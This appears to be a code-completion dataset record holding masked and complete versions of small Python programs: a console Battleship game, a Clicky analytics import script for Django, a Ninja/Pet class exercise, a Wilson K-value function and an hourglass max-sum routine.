"step-3": "<mask token>\n\n\ndef check_ok(boat, taken_positions):\n boat.sort()\n for i in range(len(boat)):\n if boat[i] in taken_positions:\n boat = [-1]\n break\n elif boat[i] > 99 or boat[i] < 0:\n boat = [-1]\n break\n elif boat[i] % 10 == 9 and i < len(boat) - 1:\n if boat[i + 1] % 10 == 0:\n boat = [-1]\n break\n if i != 0:\n if boat[i] != boat[i - 1] + 1 and boat[i] != boat[i - 1] + 10:\n boat = [-1]\n break\n return boat\n\n\ndef check_shot(shot, ships, hit, miss, comp, sinked_boats):\n cond = 0\n for i in range(len(ships)):\n if shot in ships[i]:\n ships[i].remove(shot)\n if len(ships[i]) > 0:\n hit.append(shot)\n cond = 1\n else:\n comp.append(shot)\n cond = 2\n sinked_boats += 1\n if cond == 0:\n miss.append(shot)\n return ships, hit, miss, comp, cond, sinked_boats\n\n\ndef create_playground(hit, miss, comp):\n print(' battleship')\n print(' 0 1 2 3 4 5 6 7 8 9')\n block = 0\n for i in range(10):\n row = ''\n for j in range(10):\n character = '_ '\n if block in miss:\n character = 'x '\n elif block in hit:\n character = 'o '\n elif block in comp:\n character = 'Q '\n row += character\n block += 1\n print(i, ' ', row)\n print('')\n\n\ndef check_empty(ships):\n return all([(not elem) for elem in ships])\n\n\n<mask token>\n\n\ndef create_ships_u(taken_positions, num_boats):\n ships = []\n for len_of_boat in num_boats:\n ship, taken_positions = get_ship(len_of_boat, taken_positions)\n ships.append(ship)\n return ships, taken_positions\n\n\n<mask token>\n\n\ndef get_ship(len_of_boat, taken_positions):\n while True:\n ship = []\n print('enter your ship of length', len_of_boat)\n for i in range(len_of_boat):\n while True:\n try:\n boat_num = input('please enter a number: ')\n ship.append(int(boat_num))\n except ValueError:\n print('wrong type of input')\n continue\n else:\n break\n ship = check_ok(ship, taken_positions)\n if -1 not in ship:\n taken_positions += ship\n break\n else:\n print('invalid number - please enter again')\n return ship, taken_positions\n\n\ndef get_shot_user(guesses):\n while True:\n try:\n shot = int(input('Enter your shot: '))\n if shot < 0 or shot > 99:\n shot = int(input('Enter your shot:'))\n elif shot in guesses:\n print('already guessed - please enter again')\n else:\n return shot\n except:\n print('incorrect - please enter integer only')\n\n\n<mask token>\n\n\ndef create_ships_c(taken_positions, num_boats):\n ships = []\n for len_of_boat in num_boats:\n boat_position = [-1]\n while -1 in boat_position:\n boat_start = randrange(99)\n boat_direction = randrange(1, 4)\n boat_position = create_boat(len_of_boat, boat_start,\n boat_direction, taken_positions)\n ships.append(boat_position)\n taken_positions += boat_position\n return ships, taken_positions\n\n\ndef create_boat(len_of_boat, boat_start, boat_direction, taken_positions):\n boat = []\n if boat_direction == 1:\n for i in range(len_of_boat):\n boat.append(boat_start - i * 10)\n boat = check_ok(boat, taken_positions)\n elif boat_direction == 2:\n for i in range(len_of_boat):\n boat.append(boat_start + i)\n boat = check_ok(boat, taken_positions)\n elif boat_direction == 3:\n for i in range(len_of_boat):\n boat.append(boat_start + i * 10)\n boat = check_ok(boat, taken_positions)\n elif boat_direction == 4:\n for i in range(len_of_boat):\n boat.append(boat_start - i)\n boat = check_ok(boat, taken_positions)\n return boat\n\n\ndef get_shot_comp(guesses, tactics):\n while True:\n try:\n if len(tactics) > 0:\n shot = tactics[0]\n else:\n shot = randrange(99)\n if shot not in guesses:\n guesses.append(shot)\n break\n except:\n print('incorrect - please enter integer only')\n return shot, guesses\n\n\ndef calculate_tactics(shot, tactics, guesses, hit):\n temp = []\n if len(tactics) < 1:\n temp = [shot - 1, shot + 1, shot - 10, shot + 10]\n elif shot - 1 in hit:\n temp = [shot + 1]\n for num in [2, 3, 4, 5, 6, 7, 8]:\n if shot - num not in hit:\n temp.append(shot - num)\n break\n elif shot + 1 in hit:\n temp = [shot - 1]\n for num in [2, 3, 4, 5, 6, 7, 8]:\n if shot + num not in hit:\n temp.append(shot + num)\n break\n elif shot - 10 in hit:\n temp = [shot + 10]\n for num in [20, 30, 40, 50, 60, 70, 80]:\n if shot - num not in hit:\n temp.append(shot - num)\n break\n elif shot + 10 in hit:\n temp = [shot - 10]\n for num in [20, 30, 40, 50, 60, 70, 80]:\n if shot + num not in hit:\n temp.append(shot + num)\n break\n candidate = []\n for i in range(len(temp)):\n if temp[i] not in guesses and temp[i] < 100 and temp[i] > -1:\n candidate.append(temp[i])\n random.shuffle(candidate)\n return candidate\n\n\n<mask token>\n",
"step-4": "<mask token>\n\n\ndef check_ok(boat, taken_positions):\n boat.sort()\n for i in range(len(boat)):\n if boat[i] in taken_positions:\n boat = [-1]\n break\n elif boat[i] > 99 or boat[i] < 0:\n boat = [-1]\n break\n elif boat[i] % 10 == 9 and i < len(boat) - 1:\n if boat[i + 1] % 10 == 0:\n boat = [-1]\n break\n if i != 0:\n if boat[i] != boat[i - 1] + 1 and boat[i] != boat[i - 1] + 10:\n boat = [-1]\n break\n return boat\n\n\ndef check_shot(shot, ships, hit, miss, comp, sinked_boats):\n cond = 0\n for i in range(len(ships)):\n if shot in ships[i]:\n ships[i].remove(shot)\n if len(ships[i]) > 0:\n hit.append(shot)\n cond = 1\n else:\n comp.append(shot)\n cond = 2\n sinked_boats += 1\n if cond == 0:\n miss.append(shot)\n return ships, hit, miss, comp, cond, sinked_boats\n\n\ndef create_playground(hit, miss, comp):\n print(' battleship')\n print(' 0 1 2 3 4 5 6 7 8 9')\n block = 0\n for i in range(10):\n row = ''\n for j in range(10):\n character = '_ '\n if block in miss:\n character = 'x '\n elif block in hit:\n character = 'o '\n elif block in comp:\n character = 'Q '\n row += character\n block += 1\n print(i, ' ', row)\n print('')\n\n\ndef check_empty(ships):\n return all([(not elem) for elem in ships])\n\n\n<mask token>\n\n\ndef create_ships_u(taken_positions, num_boats):\n ships = []\n for len_of_boat in num_boats:\n ship, taken_positions = get_ship(len_of_boat, taken_positions)\n ships.append(ship)\n return ships, taken_positions\n\n\ndef create_playground_u(taken_positions):\n print(' battleships ')\n print(' 0 1 2 3 4 5 6 7 8 9')\n place = 0\n for x in range(10):\n row = ''\n for y in range(10):\n ch = ' _ '\n if place in taken_positions:\n ch = ' o '\n row = row + ch\n place = place + 1\n print(x, ' ', row)\n\n\ndef get_ship(len_of_boat, taken_positions):\n while True:\n ship = []\n print('enter your ship of length', len_of_boat)\n for i in range(len_of_boat):\n while True:\n try:\n boat_num = input('please enter a number: ')\n ship.append(int(boat_num))\n except ValueError:\n print('wrong type of input')\n continue\n else:\n break\n ship = check_ok(ship, taken_positions)\n if -1 not in ship:\n taken_positions += ship\n break\n else:\n print('invalid number - please enter again')\n return ship, taken_positions\n\n\ndef get_shot_user(guesses):\n while True:\n try:\n shot = int(input('Enter your shot: '))\n if shot < 0 or shot > 99:\n shot = int(input('Enter your shot:'))\n elif shot in guesses:\n print('already guessed - please enter again')\n else:\n return shot\n except:\n print('incorrect - please enter integer only')\n\n\n<mask token>\n\n\ndef create_ships_c(taken_positions, num_boats):\n ships = []\n for len_of_boat in num_boats:\n boat_position = [-1]\n while -1 in boat_position:\n boat_start = randrange(99)\n boat_direction = randrange(1, 4)\n boat_position = create_boat(len_of_boat, boat_start,\n boat_direction, taken_positions)\n ships.append(boat_position)\n taken_positions += boat_position\n return ships, taken_positions\n\n\ndef create_boat(len_of_boat, boat_start, boat_direction, taken_positions):\n boat = []\n if boat_direction == 1:\n for i in range(len_of_boat):\n boat.append(boat_start - i * 10)\n boat = check_ok(boat, taken_positions)\n elif boat_direction == 2:\n for i in range(len_of_boat):\n boat.append(boat_start + i)\n boat = check_ok(boat, taken_positions)\n elif boat_direction == 3:\n for i in range(len_of_boat):\n boat.append(boat_start + i * 10)\n boat = check_ok(boat, taken_positions)\n elif boat_direction == 4:\n for i in range(len_of_boat):\n boat.append(boat_start - i)\n boat = check_ok(boat, taken_positions)\n return boat\n\n\ndef get_shot_comp(guesses, tactics):\n while True:\n try:\n if len(tactics) > 0:\n shot = tactics[0]\n else:\n shot = randrange(99)\n if shot not in guesses:\n guesses.append(shot)\n break\n except:\n print('incorrect - please enter integer only')\n return shot, guesses\n\n\ndef calculate_tactics(shot, tactics, guesses, hit):\n temp = []\n if len(tactics) < 1:\n temp = [shot - 1, shot + 1, shot - 10, shot + 10]\n elif shot - 1 in hit:\n temp = [shot + 1]\n for num in [2, 3, 4, 5, 6, 7, 8]:\n if shot - num not in hit:\n temp.append(shot - num)\n break\n elif shot + 1 in hit:\n temp = [shot - 1]\n for num in [2, 3, 4, 5, 6, 7, 8]:\n if shot + num not in hit:\n temp.append(shot + num)\n break\n elif shot - 10 in hit:\n temp = [shot + 10]\n for num in [20, 30, 40, 50, 60, 70, 80]:\n if shot - num not in hit:\n temp.append(shot - num)\n break\n elif shot + 10 in hit:\n temp = [shot - 10]\n for num in [20, 30, 40, 50, 60, 70, 80]:\n if shot + num not in hit:\n temp.append(shot + num)\n break\n candidate = []\n for i in range(len(temp)):\n if temp[i] not in guesses and temp[i] < 100 and temp[i] > -1:\n candidate.append(temp[i])\n random.shuffle(candidate)\n return candidate\n\n\n<mask token>\n",
"step-5": "from random import randrange\r\nimport random\r\n\r\n\"\"\"\r\nboth user and computer funcs:\r\n\"\"\"\r\ndef check_ok(boat, taken_positions):\r\n# input: boat, taken_positions \r\n# this func checks if the boat outside the playground or the position of the boat is already in taken_position\r\n# return: boat. boat will returned as [-1] or its specific position\r\n boat.sort()\r\n for i in range(len(boat)):\r\n if boat[i] in taken_positions:\r\n #this condition checks if the block boat[i] is already in the list taken_positions\r\n boat = [-1]\r\n break \r\n elif boat[i] > 99 or boat[i] < 0:\r\n #this condition checks border 1 and 3\r\n boat = [-1]\r\n break\r\n elif boat[i] % 10 == 9 and i < len(boat) - 1:\r\n #this condition checks border 2 and 4\r\n if boat[i + 1] % 10 == 0:\r\n boat = [-1]\r\n break\r\n \r\n if i != 0:\r\n # this condition checks if there is any hole in the boat\r\n if boat[i] != boat[i - 1] + 1 and boat[i] != boat[i - 1] + 10:\r\n boat = [-1]\r\n break\r\n return boat \r\n\r\n\r\ndef check_shot(shot, ships, hit, miss, comp, sinked_boats):\r\n# input: shot, all the boats (ships), hit, miss, comp, sinked_boats\r\n# this func initially assumes that the shot is missed (cond = 0)\r\n# given a shot, this func uses a for-loop that goes through all ships to see if the shot hits one of the ships \r\n# if yes, remove the block of the boat that is hitted by the shot\r\n# append the shot to hit or comp. If comp, sinked_boats += 1\r\n# if not, append the shot to miss\r\n# return: all the boats (ships), hit, miss, comp, cond, sinked_boats\r\n cond = 0 # miss\r\n for i in range(len(ships)):\r\n if shot in ships[i]:\r\n ships[i].remove(shot)\r\n if len(ships[i]) > 0:\r\n hit.append(shot)\r\n cond = 1 # hit\r\n else:\r\n comp.append(shot)\r\n cond = 2 # comp\r\n sinked_boats += 1 \r\n if cond == 0: # miss\r\n miss.append(shot) \r\n return ships, hit, miss, comp, cond, sinked_boats\r\n\r\n\r\ndef create_playground(hit, miss, comp):\r\n# input: hit, miss, comp\r\n# this func creates the playground with the status of each block \r\n# print the playground\r\n print(\" battleship\")\r\n print(\" 0 1 2 3 4 5 6 7 8 9\")\r\n \r\n block = 0 #this variable keep track of the spot of the block\r\n for i in range(10):\r\n #create each row\r\n row = \"\"\r\n for j in range(10):\r\n #create each spot on the specific row\r\n character = \"_ \"\r\n if block in miss:\r\n character = \"x \"\r\n elif block in hit:\r\n character = \"o \" \r\n elif block in comp:\r\n character = \"Q \"\r\n row += character\r\n block += 1 #the block var increments 1 after each character is add to row\r\n print(i, \" \", row)\r\n print(\"\")\r\n\r\n\r\ndef check_empty(ships):\r\n# input: ships\r\n# [] = False, [#have element] = True\r\n# this func checks each ship in the 2D list ships\r\n# if ship is empty, return True, and vice versa\r\n# if all ships are empty, return True, else return False\r\n# return True or False \r\n return all([not elem for elem in ships])\r\n\r\n\r\n\"\"\"\r\nuser - 2 funcs:\r\n\"\"\"\r\ndef create_ships_u(taken_positions, num_boats):\r\n# input: num_boats\r\n# this func has a loop that makes all boats,\r\n# which calls the get_ship(len_of_boat, taken_positions) that creates a single boat\r\n# return: ships, which are the 2D list has len(num_boats) that contains the positions of all boats\r\n ships = [] #this is a 2D list contains the positions of all boats\r\n for len_of_boat in num_boats:\r\n ship, taken_positions = get_ship(len_of_boat, taken_positions)\r\n ships.append(ship)\r\n return ships, taken_positions\r\n\r\n \r\ndef create_playground_u(taken_positions):\r\n print(\" battleships \")\r\n print(\" 0 1 2 3 4 5 6 7 8 9\")\r\n \r\n place = 0\r\n for x in range(10):\r\n row = \"\"\r\n for y in range(10):\r\n ch = \" _ \"\r\n if place in taken_positions:\r\n ch = \" o \" \r\n row = row + ch\r\n place = place + 1\r\n \r\n print(x,\" \",row)\r\n\r\n\r\ndef get_ship(len_of_boat, taken_positions):\r\n# input: len_of_boat, taken_positions\r\n# this func gets the boat's position from the user's input\r\n# this func checks both the type of the input(is it int) and if the boat is inside playground/in taken_positions/in correct order \r\n# return a valid ship \r\n while True:\r\n ship = []\r\n print(\"enter your ship of length\", len_of_boat)\r\n for i in range(len_of_boat):\r\n while True:\r\n try:\r\n boat_num = input(\"please enter a number: \")\r\n ship.append(int(boat_num))\r\n except ValueError: # better try again... Return to the start of the loop\r\n print(\"wrong type of input\")\r\n continue\r\n else: # is is a correct input, and we're ready to exit the loop\r\n break\r\n ship = check_ok(ship, taken_positions)\r\n\r\n if -1 not in ship: # check if a ship is valid. If yes, add the ship to taken_positions and break\r\n taken_positions += ship\r\n break\r\n else:\r\n print(\"invalid number - please enter again\")\r\n return ship, taken_positions\r\n\r\n\r\ndef get_shot_user(guesses):\r\n# input: guesses is the combined list of hit, miss, comp\r\n# this funcs asks the user to enter the shot, then checks the validity of the shot \r\n# return: the valid shot\r\n while True:\r\n try:\r\n shot = int(input(\"Enter your shot: \"))\r\n if shot < 0 or shot > 99:\r\n shot = int(input(\"Enter your shot:\"))\r\n elif shot in guesses:\r\n print(\"already guessed - please enter again\")\r\n else:\r\n return shot\r\n except:\r\n print(\"incorrect - please enter integer only\")\r\n\r\n\r\n\"\"\"\r\ncomputer - 1 funcs:\r\n\"\"\"\r\ndef create_ships_c(taken_positions, num_boats):\r\n# input: num_boats\r\n# this funcs has a loop that makes all boats,\r\n# which calls the create_boat() that creates a single boat\r\n# return: ships, which are the 2D list has len(num_boats) that contains the positions of all boats\r\n ships = [] #this is a 2D list contains the positions of all boats\r\n for len_of_boat in num_boats:\r\n boat_position = [-1] #create the initial position of every boat is [-1]\r\n while -1 in boat_position:\r\n boat_start = randrange(99) #boat starting point\r\n boat_direction = randrange(1, 4) #{1: \"up\", 2: \"right\", 3: \"down\", 4: \"left\"}\r\n boat_position = create_boat(len_of_boat, boat_start, boat_direction, taken_positions) #return the position of boat\r\n #a new boat is created after finishing the while loop\r\n ships.append(boat_position)\r\n taken_positions += boat_position #add all positions of the newly created boat to the list taken_positions\r\n return ships, taken_positions\r\n\r\n\r\ndef create_boat(len_of_boat, boat_start, boat_direction, taken_positions):\r\n# input: len_of_boat, boat_start, boat_direction, taken_positions\r\n# this func initializes boat = []\r\n# with len_of_boat, boat_start, boat_direction, this func create the position of the boat\r\n# calls check_ok(boat, taken_positions) to see if the boat outside playground or the position of the boat is already in taken_position\r\n# return: boat. boat will returned as [-1] or its specific position\r\n boat = []\r\n if boat_direction == 1:\r\n for i in range(len_of_boat):\r\n boat.append(boat_start - i * 10) # already have the position of boat after this line\r\n boat = check_ok(boat, taken_positions)\r\n elif boat_direction == 2:\r\n for i in range(len_of_boat):\r\n boat.append(boat_start + i)\r\n boat = check_ok(boat, taken_positions)\r\n elif boat_direction == 3:\r\n for i in range(len_of_boat):\r\n boat.append(boat_start + i * 10)\r\n boat = check_ok(boat, taken_positions)\r\n elif boat_direction == 4:\r\n for i in range(len_of_boat):\r\n boat.append(boat_start - i)\r\n boat = check_ok(boat, taken_positions)\r\n return boat\r\n\r\n\r\ndef get_shot_comp(guesses, tactics):\r\n# input: guesses (all moves), tactics(which is the list of all valid possible moves for the shot)\r\n# in the first mơve, tactics = []\r\n# this func checks if len(tactics) > 0\r\n# if yes, pick shot = tactics[0]\r\n# if no, pick shot = randrange(99)\r\n# this func check if shot not in guesses(which is the list of all moves) \r\n# if yes, guess.append(shot), and break\r\n# return: the valid shot, guesses\r\n while True:\r\n try:\r\n if len(tactics) > 0:\r\n shot = tactics[0]\r\n else:\r\n shot = randrange(99)\r\n \r\n if shot not in guesses:\r\n guesses.append(shot)\r\n break\r\n except:\r\n print(\"incorrect - please enter integer only\")\r\n return shot, guesses\r\n\r\n\r\ndef calculate_tactics(shot, tactics, guesses, hit):\r\n# input: shot, tactics, guesses, hit\r\n# this function takes the newly shot, and changes the tactics list accordingly\r\n# the list temp is the possible positions that the next shot can be\r\n# if the shot hits the first time, len(tactics) = 0. Then, temp is the list contains 4 blocks around the shot\r\n# else, the list temp will be created based on the last 2 shots\r\n# candidate is the list of valid possible shots that is created from temp\r\n# shuffle the order of elements inside candidate\r\n# return: candidate (candidate is tactics)\r\n temp = []\r\n if len(tactics) < 1:\r\n # got 1 hit the first time \r\n temp = [shot - 1, shot + 1, shot - 10, shot + 10] # temporary places that the next shot could be \r\n else: \r\n # got at least 2 hits \r\n # checks to see if the 4 spots around is in hit\r\n if shot - 1 in hit: # east\r\n temp = [shot + 1]\r\n for num in [2, 3, 4, 5, 6, 7, 8]:\r\n if shot - num not in hit:\r\n temp.append(shot - num) \r\n break\r\n\r\n elif shot + 1 in hit: # west\r\n temp = [shot - 1]\r\n for num in [2, 3, 4, 5, 6, 7, 8]:\r\n if shot + num not in hit:\r\n temp.append(shot + num) \r\n break\r\n \r\n elif shot - 10 in hit: # south\r\n temp = [shot + 10]\r\n for num in [20, 30, 40, 50, 60, 70, 80]:\r\n if shot - num not in hit:\r\n temp.append(shot - num) \r\n break\r\n \r\n elif shot + 10 in hit: # north. Ex: first shot is 50, next shot is 40\r\n temp = [shot - 10]\r\n for num in [20, 30, 40, 50, 60, 70, 80]:\r\n if shot + num not in hit:\r\n temp.append(shot + num) \r\n break\r\n \r\n candidate = [] # list of valid places that the next shot could be\r\n for i in range(len(temp)):\r\n if temp[i] not in guesses and temp[i] < 100 and temp[i] > -1: #checks the validity of places in temp\r\n candidate.append(temp[i])\r\n random.shuffle(candidate) # shuffle the element order of the list candidate\r\n return candidate\r\n\r\n\r\n\r\n\"\"\"\r\nmain program:\r\n\"\"\"\r\nnum_boats = [5, 4, 3, 3, 2, 2] # this list contains all boats. Each boat is represented by its length \r\n\r\n# before game\r\n# computer - 1\r\nhit1 = []\r\nmiss1 = []\r\ncomp1 = []\r\nguesses1 = []\r\ncond1 = 0\r\ntactics1 = [] # list of possible moves after a boat is hitted. After a boat is sunked, tactics reset to []\r\ntaken_positions1 = []\r\nsinked_boats1 = []\r\n\r\n# user - 2\r\nhit2 = []\r\nmiss2 = []\r\ncomp2 = []\r\nguesses2 = []\r\ncond2 = 0\r\ntactics2 = []\r\ntaken_positions2 = []\r\nsinked_boats2 = []\r\n\r\n# computer creates ships for player 1\r\nships1, taken_positions1 = create_ships_c(taken_positions1, num_boats) \r\n# user creates boat for player 2 - show board\r\nships2, taken_positions2 = create_ships_u(taken_positions2, num_boats)\r\ncreate_playground_u(taken_positions2)\r\n\r\n# loop for user and computer takes turn to shoot, and repeat until finding a winner:\r\nturns = 0\r\nwhile True: \r\n turns += 1\r\n\r\n# USER SHOOTS: using 1 because it is checking the data of computer\r\n guesses1 = hit1 + miss1 + comp1\r\n shot1 = get_shot_user(guesses1)\r\n ships1, hit1, miss1, comp1, cond1, sinked_boats1 = check_shot(shot1, ships1, hit1, miss1, comp1, sinked_boats1)\r\n create_playground(hit1, miss1, comp1)\r\n\r\n# check if all of the computer ships are empty:\r\n if check_empty(ships1):\r\n print(\"end of game - winner in\", turns)\r\n break\r\n\r\n# COMPUTER SHOOTS:\r\n guesses2 = hit2 + miss2 + comp2\r\n shot2, guesses2 = get_shot_comp(guesses2, tactics2) \r\n ships2, hit2, miss2, comp2, cond2, sinked_boats2 = check_shot(shot2, ships2, hit2, miss2, comp2, sinked_boats2)\r\n create_playground(hit2, miss2, comp2)\r\n\r\n if cond2 == 1:\r\n # got 1 hit\r\n tactics2 = calculate_tactics(shot2, tactics2, guesses2, hit2)\r\n elif cond2 == 2:\r\n # comp, and sunk the boat\r\n # reset tactics = []\r\n tactics2 = []\r\n elif len(tactics2) > 0: #len(tactics) > 0 means that there are still possible moves\r\n # got 1 hit, then miss\r\n # remove the newly shot from tactics\r\n tactics2.pop(0)\r\n # in case all 3 statements above are False, which means there is no hit in the first place, tactics is still []\r\n\r\n# check if all of the computer ships are empty:\r\n if check_empty(ships2):\r\n print(\"end of game - computer wins in\", turns)\r\n break\r\n\r\n# after both the user and computer shoot, start a new loop:\r\n\r\n",
"step-ids": [
7,
10,
11,
12,
16
]
}
|
[
7,
10,
11,
12,
16
] |
import os
import requests
import sqlite3
from models import analytics, jcanalytics
def populate():
url = 'https://api.clicky.com/api/stats/4?site_id=100716069&sitekey=93c104e29de28bd9&type=visitors-list'
date = '&date=last-30-days'
limit = '&limit=all'
output = '&output=json'
total = url+date+limit+output
r = requests.get(total)
print(total)
data = r.json()
# html = []
for item in data[0]['dates'][0]['items']:
si = item["session_id"]
ip = item["ip_address"]
time = item["time"]
timep = item["time_pretty"]
# geol = item["geolocation"]
# org = item["organization"]
if item.has_key("geolocation"):
geol = item["geolocation"]
else:
geol = ""
if item.has_key("organization"):
org = item["organization"]
else:
org = ""
add_entry(si,ip,org,time,timep,geol)
add_jcentry(org)
def add_entry(si,ip,org,time,timep,geol):
entry = analytics.objects.get_or_create(si=si,ip=ip,org=org,time=time,timep=timep,geol=geol)[0]
return entry
def add_jcentry(org):
jcentry = jcanalytics.objects.get_or_create(org=org)[0]
return jcentry
print "Starting population script..."
populate()
|
normal
|
{
"blob_id": "e8226ab6be5c21335d843cba720e66646a2dee4e",
"index": 241,
"step-1": "import os\nimport requests\nimport sqlite3\nfrom models import analytics, jcanalytics\n\n\ndef populate():\n url = 'https://api.clicky.com/api/stats/4?site_id=100716069&sitekey=93c104e29de28bd9&type=visitors-list'\n date = '&date=last-30-days'\n limit = '&limit=all'\n output = '&output=json'\n total = url+date+limit+output\n r = requests.get(total)\n print(total)\n data = r.json()\n # html = []\n for item in data[0]['dates'][0]['items']:\n si = item[\"session_id\"]\n ip = item[\"ip_address\"]\n time = item[\"time\"]\n timep = item[\"time_pretty\"]\n # geol = item[\"geolocation\"]\n # org = item[\"organization\"]\n if item.has_key(\"geolocation\"):\n geol = item[\"geolocation\"]\n else:\n geol = \"\"\n if item.has_key(\"organization\"):\n org = item[\"organization\"]\n else:\n org = \"\"\n add_entry(si,ip,org,time,timep,geol)\n add_jcentry(org)\n\ndef add_entry(si,ip,org,time,timep,geol):\n entry = analytics.objects.get_or_create(si=si,ip=ip,org=org,time=time,timep=timep,geol=geol)[0]\n return entry\n\ndef add_jcentry(org):\n jcentry = jcanalytics.objects.get_or_create(org=org)[0]\n return jcentry\n\nprint \"Starting population script...\"\npopulate()\n",
"step-2": null,
"step-3": null,
"step-4": null,
"step-5": null,
"step-ids": [
0
]
}
|
[
0
] |
from pet import Pet
class Ninja:
def __init__(self, first_name, last_name, treats, pet_food, pet):
self.first_name = first_name
self.last_name = last_name
self.treats = treats
self.pet_food = pet_food
self.pet = pet
def walk(self):
self.pet.play()
def feed(self):
self.pet.eat()
def bathe(self):
self.pet.noise()
Fox = Pet("Ninetailed Fox", "Fox", "Fire-Breathing")
Naruto = Ninja("Naruto", "Izumaki", "Rice Balls", "Ground Beef", Fox)
Naruto.feed()
print(Naruto.pet.energy)
print(Naruto.pet.health)
Naruto.bathe()
Naruto.walk()
print(Naruto.pet.energy)
print(Naruto.pet.health)
|
normal
|
{
"blob_id": "b210784a198eaa3e57b5a65ec182a746aecc0e2b",
"index": 1695,
"step-1": "<mask token>\n\n\nclass Ninja:\n\n def __init__(self, first_name, last_name, treats, pet_food, pet):\n self.first_name = first_name\n self.last_name = last_name\n self.treats = treats\n self.pet_food = pet_food\n self.pet = pet\n <mask token>\n <mask token>\n\n def bathe(self):\n self.pet.noise()\n\n\n<mask token>\n",
"step-2": "<mask token>\n\n\nclass Ninja:\n\n def __init__(self, first_name, last_name, treats, pet_food, pet):\n self.first_name = first_name\n self.last_name = last_name\n self.treats = treats\n self.pet_food = pet_food\n self.pet = pet\n\n def walk(self):\n self.pet.play()\n\n def feed(self):\n self.pet.eat()\n\n def bathe(self):\n self.pet.noise()\n\n\n<mask token>\n",
"step-3": "<mask token>\n\n\nclass Ninja:\n\n def __init__(self, first_name, last_name, treats, pet_food, pet):\n self.first_name = first_name\n self.last_name = last_name\n self.treats = treats\n self.pet_food = pet_food\n self.pet = pet\n\n def walk(self):\n self.pet.play()\n\n def feed(self):\n self.pet.eat()\n\n def bathe(self):\n self.pet.noise()\n\n\n<mask token>\nNaruto.feed()\nprint(Naruto.pet.energy)\nprint(Naruto.pet.health)\nNaruto.bathe()\nNaruto.walk()\nprint(Naruto.pet.energy)\nprint(Naruto.pet.health)\n",
"step-4": "<mask token>\n\n\nclass Ninja:\n\n def __init__(self, first_name, last_name, treats, pet_food, pet):\n self.first_name = first_name\n self.last_name = last_name\n self.treats = treats\n self.pet_food = pet_food\n self.pet = pet\n\n def walk(self):\n self.pet.play()\n\n def feed(self):\n self.pet.eat()\n\n def bathe(self):\n self.pet.noise()\n\n\nFox = Pet('Ninetailed Fox', 'Fox', 'Fire-Breathing')\nNaruto = Ninja('Naruto', 'Izumaki', 'Rice Balls', 'Ground Beef', Fox)\nNaruto.feed()\nprint(Naruto.pet.energy)\nprint(Naruto.pet.health)\nNaruto.bathe()\nNaruto.walk()\nprint(Naruto.pet.energy)\nprint(Naruto.pet.health)\n",
"step-5": "from pet import Pet \n\nclass Ninja:\n def __init__(self, first_name, last_name, treats, pet_food, pet):\n self.first_name = first_name\n self.last_name = last_name\n self.treats = treats\n self.pet_food = pet_food\n self.pet = pet\n\n\n def walk(self):\n self.pet.play()\n\n\n def feed(self):\n self.pet.eat()\n\n\n def bathe(self):\n self.pet.noise()\n\n\n\nFox = Pet(\"Ninetailed Fox\", \"Fox\", \"Fire-Breathing\")\nNaruto = Ninja(\"Naruto\", \"Izumaki\", \"Rice Balls\", \"Ground Beef\", Fox)\n\n\nNaruto.feed()\nprint(Naruto.pet.energy)\nprint(Naruto.pet.health)\nNaruto.bathe()\nNaruto.walk()\nprint(Naruto.pet.energy)\nprint(Naruto.pet.health)",
"step-ids": [
3,
5,
6,
7,
9
]
}
|
[
3,
5,
6,
7,
9
] |
<|reserved_special_token_0|>
<|reserved_special_token_1|>
def K_Wilson(w, Tr, Pr):
import numpy as np
K_value_Output = 1 / Pr * np.exp(5.37 * (1 + w) * (1 - 1 / Tr))
return K_value_Output
<|reserved_special_token_1|>
def K_Wilson(w, Tr, Pr):
# Inserting necessary libraries
import numpy as np
# Calculating K-value using Wilson correlation
K_value_Output = (1 / Pr) * np.exp(5.37 * (1 + w) * (1 - 1 / Tr))
# Returning output value
return K_value_Output
|
flexible
|
{
"blob_id": "0b42f458097d11d66160bcb8e706ccb9b5c4682a",
"index": 5744,
"step-1": "<mask token>\n",
"step-2": "def K_Wilson(w, Tr, Pr):\n import numpy as np\n K_value_Output = 1 / Pr * np.exp(5.37 * (1 + w) * (1 - 1 / Tr))\n return K_value_Output\n",
"step-3": "def K_Wilson(w, Tr, Pr):\r\n \r\n # Inserting necessary libraries\r\n import numpy as np\r\n \r\n # Calculating K-value using Wilson correlation\r\n K_value_Output = (1 / Pr) * np.exp(5.37 * (1 + w) * (1 - 1 / Tr))\r\n \r\n # Returning output value\r\n return K_value_Output",
"step-4": null,
"step-5": null,
"step-ids": [
0,
1,
2
]
}
|
[
0,
1,
2
] |
import sys
import math
def get_max_sum(arr):
max_sum = -math.inf
for i in range(1, 5):
for j in range(1, 5):
temp = arr[i][j] + arr[i - 1][j - 1] + arr[i - 1][j] + arr[i - 1][
j + 1] + arr[i + 1][j + 1] + arr[i + 1][j] + arr[i + 1][j - 1]
max_sum = max(max_sum, temp)
return max_sum
def main():
sys_in = sys.stdin
sys_out = sys.stdout
arr = []
for _ in range(6):
temp = list(map(int, sys.stdin.readline().split()))
arr.append(temp)
print(get_max_sum(arr))
if __name__ == '__main__':
main()
|
normal
|
{
"blob_id": "c99f1333c5ca3221e9932d9a9ba1d95a77924f0d",
"index": 351,
"step-1": "<mask token>\n\n\ndef get_max_sum(arr):\n max_sum = -math.inf\n for i in range(1, 5):\n for j in range(1, 5):\n temp = arr[i][j] + arr[i - 1][j - 1] + arr[i - 1][j] + arr[i - 1][\n j + 1] + arr[i + 1][j + 1] + arr[i + 1][j] + arr[i + 1][j - 1]\n max_sum = max(max_sum, temp)\n return max_sum\n\n\n<mask token>\n",
"step-2": "<mask token>\n\n\ndef get_max_sum(arr):\n max_sum = -math.inf\n for i in range(1, 5):\n for j in range(1, 5):\n temp = arr[i][j] + arr[i - 1][j - 1] + arr[i - 1][j] + arr[i - 1][\n j + 1] + arr[i + 1][j + 1] + arr[i + 1][j] + arr[i + 1][j - 1]\n max_sum = max(max_sum, temp)\n return max_sum\n\n\ndef main():\n sys_in = sys.stdin\n sys_out = sys.stdout\n arr = []\n for _ in range(6):\n temp = list(map(int, sys.stdin.readline().split()))\n arr.append(temp)\n print(get_max_sum(arr))\n\n\n<mask token>\n",
